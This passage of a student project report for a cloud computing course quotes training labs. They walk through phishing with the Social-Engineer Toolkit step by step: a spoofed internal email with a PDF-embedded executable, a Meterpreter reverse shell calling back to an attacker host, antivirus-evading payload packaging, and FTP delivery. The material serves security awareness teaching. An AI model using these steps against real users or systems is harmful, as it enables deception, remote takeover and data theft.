Možemo videti postavljanje Nine Nomad koja bi mogla biti porodična veza, i Lindu koja je takođe
softverski inženjer koji bi mogao raditi sa Filipom, pored toga vidimo Džejmsa koji je izvršni direktor
kompanije koja se zove IT Farm, mogao bi imati radni odnos koji bi mogao biti koristan da biste
saznali više o vrsti posla koji ste obavili i o tome koji je pristup Filip imao IT Farmi.

Sledeća faza koju napadač zahteva je „prijateljstvo“, obično uspostavljanjem lažnog naloga sa
informacijama koje bi Filipa mogle prevariti da ga prihvati, poput pretvaranja da radi na IT Farmi i
korišćenja toga kao opravdanja da Filip pristane na „prijateljstvo“.
Svrha je, naravno, prikupljanje informacija koje dovode do mogućeg phishing napada putem e-pošte
protiv izvršnog direktora IT Farm-a Džejmsa Kartera ili socijalnog inženjera IT / HR odeljenja Google-
a da ih natera da promene Filipovu lozinku koja im omogućava pristup.

Zaključak
Završen je deo zadatka Izviđanje socijalnog inženjeringa.

Projektni zadatak: Naziv projektnog zadatka26


Ime i prezime, br.index
CS450 – Cloud Computing

5 FIŠING
„Pecanje“ je slučaj kada zlonamerna stranka pošalje lažni imejl maskiran da je iz legitimnog, pouzdanog izvora.
Namera poruke je da prevari primaoca da instalira zlonamerni softver na svoj uređaj ili da podeli lične ili
finansijske podatke. Primer krađe identiteta je e-pošta falsifikovana da izgleda kao da ju je poslala
maloprodajna prodavnica u kojoj se od korisnika traži da klikne na vezu da bi zahtevao nagradu. Link može ići
do lažne stranice koja traži lične podatke ili može instalirati virus.

Spear phishing je visoko ciljani phishing napad. Iako krađa identiteta i krađa kopljem koriste e-poštu da bi došli
do žrtava, e-mailovi sa krađom krađe prilagođeni su određenoj osobi. Pre nego što pošalje e-poštu, napadač
istražuje interese cilja. Na primer, napadač sazna da je meta zainteresovana za automobile i da je pokušao da
kupi određeni model automobila. Napadač se pridružuje istom forumu za raspravu automobila gde je meta
član, kova ponudu za prodaju automobila i šalje e-poštu cilju. E-pošta sadrži vezu za slike automobila. Kada cilj
klikne na vezu, zlonamerni softver se instalira na računaru cilja.

Projektni zadatak: Naziv projektnog zadatka27


Ime i prezime, br.index
CS450 – Cloud Computing

6 IMPLEMENTACIJA
Predlog rešenja za unapređenje izabranog poslovnog sistema
Description

CYBRScore's Phishing lab is a premium Cybrary Lab Intended for Intermediate level students and
learners. CYBRScore's Phishing Lab teaches students how to conduct a Phishing simulation and
assessment with the objective of generating awareness among users in order to let Vulnerability
Assessment Analysts be able to visualize those areas and users that could be more vulnerable to a
Social Engineering attack.

CYBRScore's Phishing Lab is targeted toward Vulnerability Assessment Analysts as well as future
cybersecurity workers. Upon successful completion of CYBRScore's Phishing Lab, the student will be
able to Create a Phishing exploit, observe how outside access and compromise is possible, be able to
generate a Phishing awareness e-mail campaign. CYBRScore's Phishing Lab takes approximately 1
hour and 30 minutes to complete.

In CYBRScore's Phishing Lab, students will be able to generate a Phishing exploit using SET (Social
Engineering Tool) to conduct a simulated Phishing attack. Phishing is a key element in any
cybersecurity awareness and an integral part of a Vulnerability Assessment Analyst tool set.

In CYBRScore's Phishing Lab, Students will be able to open the content of an email with a phishing
attachment, download it and thus be able to observe the features and interactions with an open email
session. Learning this process is key for all Vulnerability Assessment Analysts.

In CYBRScore's Phishing Lab, offers students the possibility to learn how to create an awareness
campaign, review and tailor the content of the email that will be sent in order to be more effective
among target users once the campaign has been launched.

CYBRScore's Phishing Lab is part of the Vulnerability Assessment Analyst career path. Completion of
CYBRScore's Phishing Lab means that the student has learned and demonstrated the ability to craft a
Phishing exploit, interact with the exploit, and create a Phishing awareness e-mail. Click on the lab to
start learning a key cybersecurity skill.

Projektni zadatak: Naziv projektnog zadatka28


Ime i prezime, br.index
CS450 – Cloud Computing

Praktični primer primene fišnig napada u svrhu demonstracije slučaja.

Prvi deo ovog poglavlja obuhvata: Kreiranje phishing e-mail, demonstraciju kako phishing e-mailovi mogu da
dozvole pristup spolja i generisanje e-poštu kada se ima svest o phishing-u

Scenario Case Stady #1

U zamošljenom poslovnom sistemu primećeno je da zaposleni otvaraju sve e-poruke u svom poštanskom
sandučetu. Potrebno je zaposlenima u tom preduzeću nadgledati e-poštu. Odlučeno je da se započne
kampanja u kojij će zaposleni unutar organizacije od svojih kolega koji rade u IT službi dobijati fišing mejove i
na taj način će upoznati zaposlene sa opasnostima klika na nepoznate linkove.

00111: Phishing (Scored)


1 Hr 47 Min Remaining

6.1 GENERATE PHISHING EXPLOIT USING SET

Scenario
Per NIST SP800-83:

Phishing refers to use of deceptive computer-based means to trick individuals into disclosing sensitive
personal information. To perform a phishing attack, an attacker creates a Web site or e-mail that looks
as if it is from a well-known organization, such as an online business, credit card company, or financial
institution. The fraudulent e-mails and Web sites are intended to deceive users into disclosing personal
data, usually financial information. For example, phishers might seek usernames and passwords for
online banking sites, as well as bank account numbers.

In this section, we will show how easy it is for an attacker to generate a targeted phishing email using
Kali.

1. Log into the Kali machine using the username root and the password P@ssw0rd

Projektni zadatak: Naziv projektnog zadatka29


Ime i prezime, br.index
CS450 – Cloud Computing

2. Open the Kali Terminal by clicking the terminal icon on the left side of your desktop.

3. Open SET by typing setoolkit and pressing Enter. Press Y to accept the terms of service.

Projektni zadatak: Naziv projektnog zadatka30


Ime i prezime, br.index
CS450 – Cloud Computing

4. Select Option 1 from the menu (Social-Engineering Attacks) by typing the following into
the terminal: 1

5. Select option 1 for Spear-Phishing, then select option 1 to perform a Mass Email Attack
by typing into the terminal 1 for each occurrence.

6. Select Payload 13, which is Adobe PDF Embedded EXE Social Engineering, then select
option 2 to use a built-in Blank PDF for the attack.

Projektni zadatak: Naziv projektnog zadatka31


Ime i prezime, br.index
CS450 – Cloud Computing

7. Select option 2 to spawn a Windows Meterpreter Reverse TCP Shell.

8. When prompted for an IP address for your LHOST, enter the IP address of the Kali box,
which is 192.168.1.10. Press Enter to keep the port to connect back to at 443. It will take a few
moments to generate the payload for the exploit.

Projektni zadatak: Naziv projektnog zadatka32


Ime i prezime, br.index
CS450 – Cloud Computing

9. Let's change the filename of the pdf to something different. For now, let's call it
pcfix.zip.pdf

10. Select option 1 to e-mail attack a single email address, then select option 1 again for a
pre-defined template.

11. Select option 4, which will use the Strange internet usage email template. When prompted,
send the email to tsmith@organization.com

Projektni zadatak: Naziv projektnog zadatka33


Ime i prezime, br.index
CS450 – Cloud Computing

12.

13. Next, select option 2 to use your own server or open relay. We're going to spoof an email
from within the company. Enter admin@organization.com as the "From" address. Enter
admin as the FROM NAME that the user will see.

Use admin@organization.com for Username for open-relay.


Use password for the password.

A properly secured email gateway would typically not allow SMTP relay, but open
relays do still occur in the real world.

14. Enter 192.168.1.76 as the SMTP address we'll be attacking. Press Enter to leave the default
SMTP port (25), then type yes to flag the message as high priority.

Projektni zadatak: Naziv projektnog zadatka34


Ime i prezime, br.index
CS450 – Cloud Computing

15. Enter no when it asks if the server supports TLS, then type yes to setup a listener on port
443 to detect if a user clicks the attachment.

Projektni zadatak: Naziv projektnog zadatka35


Ime i prezime, br.index
CS450 – Cloud Computing

6.1.1 OPEN PHISHING ATTACHMENT

1. Using the Resources tab in the right panel of the lab window, switch over to the Windows
10 virtual machine.

2. Log in to your Windows 10 machine using the username Admin and the password
password. We're going to simulate a user clicking the .pdf link that you sent out in the previous
steps.

Projektni zadatak: Naziv projektnog zadatka36


Ime i prezime, br.index
CS450 – Cloud Computing

3. On the Desktop, double-click the Mozilla Thunderbird icon.

It has already been configured to receive mail for the tsmith@organization.com account.

Projektni zadatak: Naziv projektnog zadatka37


Ime i prezime, br.index
CS450 – Cloud Computing

4. Click on the email in your inbox from the admin. Click Save at the bottom of the screen.

Save the file to your Desktop.

Read the content of the email. It appears to come from an admin account on the
organization.com domain. It then asks a user to help in fixing a virus outbreak.

Projektni zadatak: Naziv projektnog zadatka38


Ime i prezime, br.index
CS450 – Cloud Computing

5. Double-click the file on your desktop to open it in Adobe Reader.

Projektni zadatak: Naziv projektnog zadatka39


Ime i prezime, br.index
CS450 – Cloud Computing

6. When prompted in adobe acrobat, accept the license terms. It will ask you to save in order
to extract its contents. Navigate to the Desktop and click the Save button. At the Launch File
prompt, click the Open button.

You may get a message that the command processor has stopped working - this is fine
and your remote session should have still opened on the Kali machine.

Projektni zadatak: Naziv projektnog zadatka40


Ime i prezime, br.index
CS450 – Cloud Computing

7. Switch to your Kali machine. You should see that a Meterpreter session has been opened.
Press Enter to return to a prompt, then type sessions -i 1. This will allow you to interact with
your active meterpreter session. From here an attacker can escalate privileges or install warez.

Projektni zadatak: Naziv projektnog zadatka41


Ime i prezime, br.index
CS450 – Cloud Computing

This section ends with the user being able to interact with a meterpreter shell. This lab is meant to show
you how an attack can leverage a phishing attempt to get a reverse shell. Attackers can use Veil and
other payload obfuscation methods to bypass commercial antivirus.

At many companies, HR and recruiting are prime targets, as it's their job to open attachments from
untrusted sources. These individuals should open untrusted documents in a virtual sandbox when
possible. Adobe specifically has been targeted by a number of 0-day vulnerabilities. When possible,
look to use an alternative PDF viewer (e.g. foxit, Nitro PDF).

6.1.2 GENERATE PHISHING AWARENESS EMAIL

1. Switch back to your Windows10 machine.

2. Open the Security Reminder doc, located in your Documents folder. Read over the
document. This is an example Security Awareness document that may be disseminated to
company employees.

Projektni zadatak: Naziv projektnog zadatka42


Ime i prezime, br.index
CS450 – Cloud Computing

3. Open Thunderbird again and click the address admin@organization.com

Projektni zadatak: Naziv projektnog zadatka43


Ime i prezime, br.index
CS450 – Cloud Computing

4. Now that we have a better understanding of how phishing works and we've seen an
example security awareness document, we need to draft an email that address phishing threats
to our employees. To save us time, there is a template already created in the Documents folder.
Open Phishing Reminder from the Documents folder and read the contents of the message in
Open Office.

Projektni zadatak: Naziv projektnog zadatka44


Ime i prezime, br.index
CS450 – Cloud Computing

5. Copy the contents of Phishing Reminder.docx. Move back to Thunderbird and select
Write a new message (in the center of the Thunderbird window).

Prior to dissemination, a Phishing Alert email should generally be reviewed and


approved by senior IT management at your company.

Notice we didn't attach the document to the email. Additionally, plain text email (non
HTML) is a best security practice.

Projektni zadatak: Naziv projektnog zadatka45


Ime i prezime, br.index
CS450 – Cloud Computing

6. In the To: address, enter all@organization.com. The Subject line should read Phishing
Alert. Paste the contents of Phishing Reminder.docx in the body of the email. Press the Send
button when complete.

Projektni zadatak: Naziv projektnog zadatka46


Ime i prezime, br.index
CS450 – Cloud Computing

Per NIST SP 800-83:

As part of awareness activities, organizations should educate their users on the techniques that
criminals
use to trick users into disclosing information. Organizations should also provide users with
recommendations for avoiding phishing attacks, which are described in Section 2.8.1. Examples of
such
recommendations are as follows:

Projektni zadatak: Naziv projektnog zadatka47


Ime i prezime, br.index
CS450 – Cloud Computing

Never reply to e-mail requests for financial or personal information. Organizations should not
ask for such information by e-mail, because e-mail is susceptible to monitoring by unauthorized
parties. Instead, call the organization at its legitimate phone number, or type the organization's
known Web site address into a Web browser. Do not use the contact information provided in the
e-mail.

Do not provide passwords, PINs, or other access codes in response to e-mails or unsolicited
popup windows. Only enter such information into the organization's legitimate Web site.

Do not open suspicious e-mail file attachments, even if they come from known senders. If an
unexpected attachment is received, contact the sender (preferably by a method other than e-mail,
such as a phone) to confirm that the attachment is legitimate.

Do not respond to any suspicious or unwanted e-mails. (Asking to have an e-mail address
removed from a malicious party's mailing list confirms the existence and active use of that e-mail
address, potentially leading to additional attack attempts.)

Projektni zadatak: Naziv projektnog zadatka48


Ime i prezime, br.index
CS450 – Cloud Computing

socijalni inžinjering – implentacija

 Introduction
 Lab Topology
 Exercise 1- Social Engineering Types and Techniques
 Exercise 2 - Using the Social-Engineer Toolkit (SET)
 Exercise 3 - Preventing Social Engineering Exploitation
 Review

 Introduction
Ethical Hacking
Social Engineering
Social Engineering Toolkit (SET)
Reverse Handler
Payload
PhishTank
Netcraft Toolbar

Welcome to the Social Engineering Practice Lab. In this module, you will be provided with the
instructions and devices needed to develop your hands-on skills.

 Learning Outcomes
In this module, you will complete the following exercises:

 Exercise 1 - Social Engineering Types and Techniques


 Exercise 2 - Using the Social-Engineer Toolkit (SET)
 Exercise 3 - Preventing Social Engineering Exploitation

After completing this lab, you will be able to:

 Know the basic components of social engineering


 Know the motivation techniques
 Know phishing and its types
 Know hoax, baiting, shoulder surfing, tailgating
 Create a Malicious Payload
 Copy the File to the User’s System
 Download the Payload
 Execute the Payload
 Collect Evidence of Compromise on User’s System
 Conduct Social Engineering Using a Cloned Website
 Use the Netcraft Toolbar

Projektni zadatak: Naziv projektnog zadatka49


Ime i prezime, br.index
CS450 – Cloud Computing

 Use the PhishTank Website


 Exam Objectives
The following exam objective is covered in this lab:

 3.1 Information Security Controls

Note: Our main focus is to cover the practical, hands-on aspects of the exam objectives. We
recommend referring to course material or a search engine to research theoretical topics in more
detail.

 Lab Duration
It will take approximately 1 hour to complete this lab.

 Help and Support


For more information on using Practice Labs, please see our Help and Support page. You can also
raise a technical support ticket from this page.

Click Next to view the Lab topology used in this module.

 Lab Topology
During your session, you will have access to the following lab configuration.

Projektni zadatak: Naziv projektnog zadatka50


Ime i prezime, br.index
CS450 – Cloud Computing

Depending on the exercises, you may or may not use all of the devices, but they are shown here in the
layout to get an overall understanding of the topology of the lab.

 PLABDC01 - (Windows Server 2019 - Domain Controller)


 PLABDM01 - (Windows Server 2019 - Domain Member)
 PLABWIN10 - (Windows 10 - Domain Member)
 PLABKALI01 - (Kali 2019.2 - Linux Kali Workstation)

Click Next to proceed to the first exercise.

Projektni zadatak: Naziv projektnog zadatka51


Ime i prezime, br.index
CS450 – Cloud Computing

6.1.3 EXERCISE 1- SOCIAL ENGINEERING TYPES AND TECHNIQUES

Social engineering is the art of manipulating and utilizing human behavior to conduct a security breach.
In social engineering, the victim does not realize that they are being used. Users are considered the
weakest link in the security chain and are easy to exploit. The attacker can use various methods in
social engineering to gain sensitive and confidential information causing a security breach. The attacker
can use methods such as sending an E-mail or redirecting the user to a malicious Webpage.

In social engineering, the attacker psychologically manipulates the victim and misdirects them to obtain
the desired information.

Figure 1.1: Diagram showing that social engineering consists of psychology, manipulation, and
misdirection.

Social engineering can be performed in various ways. For example:

 Over the telephone


 In-person
 Performing a task on a system
Projektni zadatak: Naziv projektnog zadatka52
Ime i prezime, br.index
CS450 – Cloud Computing

Social engineering can be considered as the basis for most forms of passive information gathering
techniques. The outcomes of social engineering can be devastating. With one user as a target in an
organization, the attacker can perform a security breach of the entire network. It is just a matter of
getting inside the network using the information provided by the user.

There can be various types of users who can be the target of social engineering. Some of the common
targets are:

 Receptionist
 IT Helpdesk
 HR department
 Top management

In this exercise, you will learn about social engineering.

 Learning Outcomes
After completing this exercise, you will be able to:

 Know the basic components of social engineering


 Know the motivation techniques
 Know phishing and its types
 Know hoax, baiting, shoulder surfing, tailgating

 Task 1 - Know the Basic Components of Social Engineering

Social engineering is a method of extracting valuable information from a person to assist in an attack.
The attacker can use one of the three components of social engineering:

 Elicitation
 Interrogation
 Pretexting

 Elicitation

When using elicitation, the attacker extracts the information from the victim without asking direct
questions. Rather, the attacker asks open-ended questions and then keeps narrowing them to the point
that the victim reveals the information. In this process, the victim does not realize that they are giving
valuable information to the attacker.

 Interrogation

The attacker interrogates the victim to extract valuable information. However, the attacker needs to be
conscious of asking too many questions, to keep the victim from becoming suspicious of them.

The attacker, other than asking questions, can also observe the victim. For example, the attacker may
pay attention to the following:
Projektni zadatak: Naziv projektnog zadatka53
Ime i prezime, br.index
CS450 – Cloud Computing

 Body language
 Body gestures - the movement of hands and feet
 Facial expressions

 Pretexting

Pretexting is the practice of giving fake reasons for actions to obtain information. For example, the
attacker hides their real identity and lies about the purpose of the information they require. The purpose
of the conversation is fabricated to gain access to personal information.

Pretexting can be performed through various methods, such as:

 Telephone
 E-mail
 Instant messaging

Anyone can be a target of pretexting. It is most often used by:

 Corporate spies
 Private investigators
 Law enforcement agents

 Task 2 - Know the Motivation Techniques

An attacker, when using social engineering, has to use a method or technique to obtain the desired
information. There are various techniques that can be used by the attacker. Some of the commonly used
techniques are:

 Authority: The attacker shows authority by pretending to be from an organization such as law
enforcement. The attacker displays confidence in pretending to be someone with authority and
pressurizes the victim to provide information. For example, the attacker may call the reception
and tell the receptionist that he is calling from the police department and needs certain
information.
 Urgency: With this technique, a sense of urgency is created, which forces the victim to make a
quick decision without much thought. For example, the attacker may call a victim for the
password to be shared and reset immediately, or his account will be terminated.
 Social proof: Social proof is often used when a victim is in a situation they do not know how to
handle. Due to the victim being unsure of what to do, they make decisions by observing others.
There are several ways an attacker can apply this technique to take advantage of the situation by
displaying an act that convinces the victim that this is the correct behavior.
 Fear: The attacker uses fear to make the victim do what they want. The attacker creates a
situation in which the victim is forced to act quickly to avoid a dangerous outcome.

 Task 3 - Know Phishing and Its Types

Phishing is a social engineering attack that uses technical deception to convince a user to provide
personal information, such as passwords, social security numbers, credit card numbers, and bank

Projektni zadatak: Naziv projektnog zadatka54


Ime i prezime, br.index
CS450 – Cloud Computing

account details. In the phishing attack, the attacker can create a replica Website or Webpage that tricks
the user into providing personal information. The Website or Webpages are such good lookalikes of the
original Website or Webpages that the user gets tricked. The URLs are close to the original, which
most of the time, users don’t bother to check. One of the key reasons behind phishing is financial gain.

Three methods are commonly used in phishing:

 Mass mailing: A large audience is targeted. Due to the amount of people targeted, it is highly
likely that at least some will fall for the attack. This method is usually performed using SPAM.
 Instant messaging: In recent years, instant messaging has become a more common method of
phishing. Malicious URLs are sent with attractive messages to lure users into clicking them.
 Malicious Websites: Phishing can also be initiated through malicious Websites. Sometimes
these are very similar to legitimate websites.

Phishing is a four-stage process. These stages are as follows:

 Initiation: The attacker prepares.


 Execution: The attacker sends out the mass mail or instant message to hundreds or thousands
of users.
 User Action: The user performs two tasks. First, they click on the URL and then enter the
personal information on the Webpage.
 Completion: The information that is entered by the user is received by the attacker and saved.
It is now up to the attacker to use this information.

By the end of the fourth stage, the phishing attack is successfully completed. In a phishing attack, the
attacker can use various attack methods. Some of these attack methods are:

 Man-In-The-Middle
 Session Hijacking
 Phishing through Search Engines
 Link Manipulation
 URL Obfuscation Attacks
 Client-side Vulnerabilities
 Cross-site Scripting
 Malware / Keyloggers / Screen loggers / Trojans
 E-mails (Deceptive Phishing)
 Hosts File Poisoning
 DNS-based Phishing
 Content-Injection

 Reasons for Successful Phishing Attacks

There are various reasons for a phishing attack to become successful. Some of the common reasons are:

 Lack of knowledge: Users are not trained enough or are completely unaware of the dangers of
phishing attacks. Attackers use this method on several hundreds or thousands of users at once,
and several users fall prey to the attack.

Projektni zadatak: Naziv projektnog zadatka55


Ime i prezime, br.index
CS450 – Cloud Computing

 Visual deception: Attackers use a similar URL or domain names with an almost exact replica
of the legitimate Website. Users are deceived with the replica of the Website and without
realizing enter their user credentials, which are then captured by the attacker and used on the
real Website.
 Visual Indicators: Users mostly do not pay attention to the URL or the domain name and
therefore, end up being a victim of the phishing attack.

 Types of Phishing Attacks

Even though there are several types of phishing attacks, the following are three prominent ones:

Spear Phishing

Spear phishing is focused on specific targets. Unlike standard phishing, it does not focus on the mass
public. In this form of phishing, the attacker takes time to research the target, who typically are from
organizations. The attacker sends out personalized E-mails that typically carry a sense of urgency.

The E-mails are designed to lure the target to click the provided URL. After the URL is clicked,
malware is downloaded, or personal and sensitive information is exposed.

Spear phishing is usually used with the pretexting technique. The attacker gathers information from
various Websites, specifically focusing on social networking sites.

Whaling

Whaling is a form of phishing attack that follows the same process as phishing but targets senior
executives or high-profile candidates within an organization, specifically the CxO candidates.

Pharming

In this type of phishing attack, when a user types the correct URL in the Web browser, the user is
redirected to an exact lookalike Website. The user has not done anything wrong, but the attack has still
occurred. This is done by DNS cache poisoning. The real IP address mapped to the legitimate URL is
changed to an IP address that redirects the user to a malicious Website, which is an exact lookalike.
The user will not be able to suspect anything here because the URL is correct.

 Task 4 - Know Hoax, Baiting, Shoulder Surfing, and Tailgating

The following methods are commonly used in social engineering:

 Hoax

A hoax email is sent to a high number of recipients with the aim of causing confusion and alarm. They
are usually very convincing and can be quite extreme.

Generally, an alarming or urgent situation is the subject of the email. The recipients are then prompted
to forward the email on to more people.

Projektni zadatak: Naziv projektnog zadatka56


Ime i prezime, br.index
CS450 – Cloud Computing

For example, an email is sent stating that there is a particular computer virus outbreak that causes a lot
of damage and that everyone possible needs to be made aware so certain precautions or actions can be
taken.

The original sender of the hoax does not have a direct gain from the circulation of the email, it is more
to trick, confuse, and panic people.

 Shoulder Surfing

Shoulder surfing is a social engineering attack performed by looking over the shoulder of the victim to
retrieve a credit card number, passwords, or any other pertinent information. The attacker directly
observes the information entered by the victim by standing very close or behind the victim or uses
vision-enhancing aids or binoculars to observe from far. Shoulder surfing attackers also use the
technique of fixing up closed-circuit cameras hidden behind the wall or ceiling to obtain sensitive
information.

 Baiting

Baiting is an attack that uses CDs, DVDs, or USB drives. It does not use E-mails as the medium but
relies on storage devices. Mostly, the USB drives are used in this scenario. The USB drives are loaded
with malware and placed in places where they are easy to find. For example, an office worker may find
a USB drive in the parking lot of their office with something like “PAYROLL” or “ACCOUNTS”
written on it to entice the finder into using it. When the finder uses the USB drive on the company’s
laptop, the malware is triggered and infects the laptop. Through the laptop, the malware can eventually
spread to the network.

 Tailgating

Tailgating is a social engineering act of gaining access to an electronically locked system or a restricted
area by following a user who has legitimate access, with the intention of accessing vulnerable
information. Tailgating is also known as piggybacking.

Projektni zadatak: Naziv projektnog zadatka57


Ime i prezime, br.index
CS450 – Cloud Computing

6.1.4 EXERCISE 2 - USING THE SOCIAL-ENGINEER TOOLKIT (SET)

Social-Engineer Toolkit (SET) is an open-source Python-based toolkit that you can use to perform
social engineering attacks. SET is part of Kali Linux. Using SET, you can perform various attacks,
such as email phishing or Web-based attacks.

In this exercise, you will learn about using SET.

 Learning Outcomes
After completing this exercise, you will be able to:

 Create a Malicious Payload


 Copy the File to the User’s System
 Download the Payload
 Execute the Payload
 Collect Evidence of Compromise on User’s System
 Conduct Social Engineering Using a Cloned Website

 Your Devices
You will be using the following devices in this lab. Please power on this device.

 PLABDC01 - (Windows Server 2019 - Domain Controller)


 PLABWIN10 - (Windows 10 - Domain Member)
 PLABKALI01 - (Kali 2019.2 - Linux Kali Workstation)

 Task 1 - Create a Malicious Payload

To exploit a user’s system, you need first to create a malicious payload, which can be done with SET.

In this task, you will create a malicious payload.

Note: When first logging into the Kali terminal, you might be greeted with a PID session error. This
will not affect your working environment. Simply click on the X button to remove the message and
continue with the lab practical.
Projektni zadatak: Naziv projektnog zadatka58
Ime i prezime, br.index
CS450 – Cloud Computing

 Step 1

Ensure you have powered on all the devices listed in the introduction and connect to PLABKALI01.

Login using these credentials:

Username: root

Password: Passw0rd

The Kali desktop is displayed.

Projektni zadatak: Naziv projektnog zadatka59


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.1 Screenshot of PLABKALI01: Displaying the desktop screen of the Kali Linux.

Projektni zadatak: Naziv projektnog zadatka60


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 2

On the desktop, from the left pane, click Terminal.

Note: SET provides many tools. In this lab, you will focus on specific tools, but in your spare time, you
are free to try all these tools to enhance your learning.

Projektni zadatak: Naziv projektnog zadatka61


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.2 Screenshot of PLABKALI01: Clicking the Terminal icon from the left pane on the desktop.

Projektni zadatak: Naziv projektnog zadatka62


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 3

The terminal window is displayed. Type the following command:

setoolkit

Press Enter.

Projektni zadatak: Naziv projektnog zadatka63


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.3 Screenshot of PLABKALI01: Executing the setoolkit command in the command prompt
window.

Projektni zadatak: Naziv projektnog zadatka64


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 4

If you are using SET for the first time, you need to accept the terms of service. Type the following
letter:

Press Enter.

Projektni zadatak: Naziv projektnog zadatka65


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.4 Screenshot of PLABKALI01: Entering y to Accept the terms of service to start the Social
Engineering Toolkit (SET).

Projektni zadatak: Naziv projektnog zadatka66


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 5

You are now on the main menu. You will notice that there are multiple options displayed. Each option
is designed to perform a specific task. For example, you can update the Social Engineering Toolkit by
selecting option 5.

To continue with this task, you will need to select the 1) Social-Engineering Attacks option. Type the
following number:

Press Enter.

Projektni zadatak: Naziv projektnog zadatka67


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.5 Screenshot of PLABKALI01: Entering 1 to Select the option 1) Social- Engineering
Attacks.

Projektni zadatak: Naziv projektnog zadatka68


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 6

Next, you will see another menu that relates to the Social-Engineering Attacks option. Out of the
given choices, you can choose 4) Create a Payload and Listener. Type the following number:

Press Enter.

Projektni zadatak: Naziv projektnog zadatka69


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.6 Screenshot of PLABKALI01: Entering 4 to Select the option 4) Create a Payload and
Listener.

Projektni zadatak: Naziv projektnog zadatka70


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 7

Next, you will be prompted to select an option. Out of the given choices, you can choose 5) Windows
Meterpreter Reverse_TCP X64. Type the following number:

Press Enter.

Projektni zadatak: Naziv projektnog zadatka71


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.7 Screenshot of PLABKALI01: Entering 5 to Select the option 5) Windows Meterpreter
Reverse_TCP X64 ows x64), Meterpreter payload.

Projektni zadatak: Naziv projektnog zadatka72


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 8

You will be prompted to provide the IP address for the payload listener. This is the IP address for your
system, which is the Kali Linux device. In this lab environment, the IP address for the Kali Linux is
192.168.0.4.

For the IP address for the payload listener option, enter the following IP address:

192.168.0.4

Press Enter.

Note: In the real-world environment, you will have a different IP address. You should not be using this
IP address as it is applicable only in this lab environment. If you do not know the IP address of your
Kali Linux, simply open another command prompt window, and run ifconfig. If you know the network
adapter name, then you can run ifconfig eth0, where eth0 is the name of the network adapter. You will
have to check your system.

Projektni zadatak: Naziv projektnog zadatka73


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.8 Screenshot of PLABKALI01: Entering the IP address of the Kali Linux for the payload
listener.

Projektni zadatak: Naziv projektnog zadatka74


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 9

Next, you will be prompted to enter the port number. Type the following port number in the Enter the
PORT for the reverse listener option:

443

Press Enter.

Projektni zadatak: Naziv projektnog zadatka75


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.9 Screenshot of PLABKALI01: Entering the port number for the reverse listener.

Projektni zadatak: Naziv projektnog zadatka76


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 10

Notice that the backdooring a legit executable process starts. An executable is now being packaged in a
manner that the antivirus cannot detect it. After the executable is created, it is stored in the /root/.set.
The default name for the file is payload.exe, which you will change after transporting it to the victim’s
system.

You are now prompted to start the payload and listener. Type the following:

yes

Press Enter.

Projektni zadatak: Naziv projektnog zadatka77


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.10 Screenshot of PLABKALI01: Entering YES to start the payload and listener.

Projektni zadatak: Naziv projektnog zadatka78


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 11

The Metasploit framework now starts. You are now ready to move to the next level, which is sharing
the payload with the victim and then capturing the information when the victim executes the payload.

You are now at the msf exploit (handler) prompt.

Projektni zadatak: Naziv projektnog zadatka79


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.11 Screenshot of PLABKALI01: Showing the successful start of the payload handler.
Leave the devices you have powered on in their current state and proceed to the next task.

Projektni zadatak: Naziv projektnog zadatka80


Ime i prezime, br.index
CS450 – Cloud Computing

 Task 2 - Copy the File to the User’s System

After you have created the payload, you need to share it with the victim. In the real environment, you
will have different methods of transporting this payload to the victim’s system. For example, some of
the common transport methods are:

 E-mail: attach the payload to an E-mail and send it to the victim.


 USB: add the payload to a USB, and when the victim plugs-in the USB to the system, it can be
triggered.
 Download: keep the infected file in a download repository, where the victim downloads the
payload.
 FTP: share it through FTP - making it look like a legitimate file.

Since this is a lab environment, you can simulate the download of the file from the FTP server. In real-
world scenarios, the users are likely to download files that they assume are legitimate applications. The
attackers, usually insert the payload in these files that the users download.

In this task, you will setup an FTP server and share the file with the victim.

 Step 1

Ensure that you have logged into the Kali Linux system and also ensure that the Metasploit window is
opened. Notice that the payload handler is in running state.

Projektni zadatak: Naziv projektnog zadatka81


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.12 Screenshot of PLABKALI01: Showing the successful start of the payload handler.

Projektni zadatak: Naziv projektnog zadatka82


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 2

Next, you need to setup an FTP server. There are multiple options. Either you can setup an independent
FTP server or use an auxiliary FTP server of the Metasploit.

To setup the FTP server, type the following command:

use auxiliary/server/ftp

Press Enter.

Projektni zadatak: Naziv projektnog zadatka83


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.13 Screenshot of PLABKALI01: Starting the auxiliary FTP server of the Metasploit.

Projektni zadatak: Naziv projektnog zadatka84


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 3

Notice that the command prompt is now changed to msf5 auxiliary(server/ftp). You need to set the
FTP root directory now. To do this, type the following command:

set FTPROOT /root/.set/

Press Enter.

Projektni zadatak: Naziv projektnog zadatka85


Ime i prezime, br.index
CS450 – Cloud Computing

Figure 2.14 Screenshot of PLABKALI01: Setting the FTPROOT directory of the FTP server.

Projektni zadatak: Naziv projektnog zadatka86


Ime i prezime, br.index
CS450 – Cloud Computing

 Step 4

Next, you need to type the following command to trigger the payload on the target system:

exploit

Press Enter.

Alert: If you miss this step, you will not be able to connect to the FTP server. This is a critical step.

Projektni zadatak: Naziv projektnog zadatka87


Ime i prezime, br.index
CS450 – Cloud Computing

